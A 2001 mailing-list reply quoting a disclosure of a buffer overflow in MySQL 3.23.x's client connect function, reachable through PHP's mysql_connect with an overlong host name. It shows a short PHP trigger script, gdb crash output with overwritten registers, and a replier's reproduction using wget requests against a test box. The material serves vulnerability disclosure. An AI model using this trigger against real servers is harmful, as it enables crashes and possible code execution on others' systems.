On Monday 12 February 2001 18:22, you wrote:
> ----- Original Message -----
> From: "Joao Gouveia" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding this issues on 2001-01-26.
> >
> > There still are some potential security flaws with MySql lastest stable
> > release.
> > Follows some tests i've made all with:
> >
> > MySql v3.23.32
> > PHP v4.0.4pl1 (static)
> > apache-1.3.14
> >
> > Let's look at a pratical example:
> > A simple php script:
> > <?
> > for ( $i=0 ; $i<= $buffer-1 ; ++$i )
> > $host.="A";
> >
> > $cid = mysql_connect($host,$usr,$pwd);
> > ?>
> > Let's run apache ( latest version compiled with latest version of PHP )
> > in debugging mode to see what hapens:
> > <quote>
> > spike:~ # gdb /www/bin/httpd
> > ...
> > (gdb) run -X
> > Starting program: /www/bin/httpd -X
> > </quote>
> > On our browser we issue: test.php?buffer=120
> > gdb shows the following
> > <quote>
> > Program received signal SIGSEGV, Segmentation fault.
> > 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > (gdb) bt
> > #0 0x40030cf3 in mysql_real_connect () from
> > /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10
> > #1 0x41414141 in ?? ()
> > (gdb) inf reg
> > eax 0x82010c0 136319168
> > ecx 0x3 3
> > edx 0x82010f4 136319220
> > ebx 0x40046324 1074029348
> > esp 0xbfffdc30 0xbfffdc30
> > ebp 0xbfffdfbc 0xbfffdfbc
> > esi 0x8204ba5 136334245
> > edi 0x41414141 1094795585
> > eip 0x40030cf3 0x40030cf3
> > eflags 0x10203 66051
> > cs 0x23 35
> > ss 0x2b 43
> > ds 0x2b 43
> > es 0x2b 43
> > fs 0x0 0
> > gs 0x0 0
> > (gdb)
> > </quote>
Lets try this problem :
Secenario :
Debian Woody.
mysql Ver 11.11 Distrib Mysql 3.23.31
Apache 1.3.14
php 4.0.4pl1
StuffBox:/usr/sbin# gdb apache
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you a
welcome to change it and/or distribute copies of it under certain conditio
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)...
(gdb) run -X
Starting program: /usr/sbin/apache -X
[..]
On the other machine I wirte this script :
<?
for ( $i=0 ; $i<= $buffer-1 ; ++$i )
$host.="A";
$cid = mysql_connect($host,$usr,$pwd);
?>
and uploaded to my public_html in StuffBox ( The Box That is running apache +
mysql + php ).
and test from other site some buffers lengths :
200:
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200
StuffBox :
Program received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0 0x40182e9d in inet_aton () from /lib/libc.so.6
#1 0x40182e52 in inet_addr () from /lib/libc.so.6
#2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax 0x401ba160 1075552608
ecx 0x0 0
edx 0x2 2
ebx 0x401b9474 1075549300
esp 0xbfffe27c 0xbfffe27c
ebp 0xbfffe2b4 0xbfffe2b4
esi 0x61697620 1634301472
edi 0x6 6
eip 0x40182e9d 0x40182e9d
500 :
PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500
rogram received signal SIGSEGV, Segmentation fault.
0x40182e9d in inet_aton () from /lib/libc.so.6
(gdb)
(gdb) bt
#0 0x40182e9d in inet_aton () from /lib/libc.so.6
#1 0x40182e52 in inet_addr () from /lib/libc.so.6
#2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10
(gdb) inf reg
eax 0x401ba160 1075552608
ecx 0x0 0
edx 0x2 2
ebx 0x401b9474 1075549300
esp 0xbfffe27c 0xbfffe27c
ebp 0xbfffe2b4 0xbfffe2b4
esi 0x41414141 1094795585 <<=
edi 0x6 6
eip 0x40182e9d 0x40182e9d
Cya.
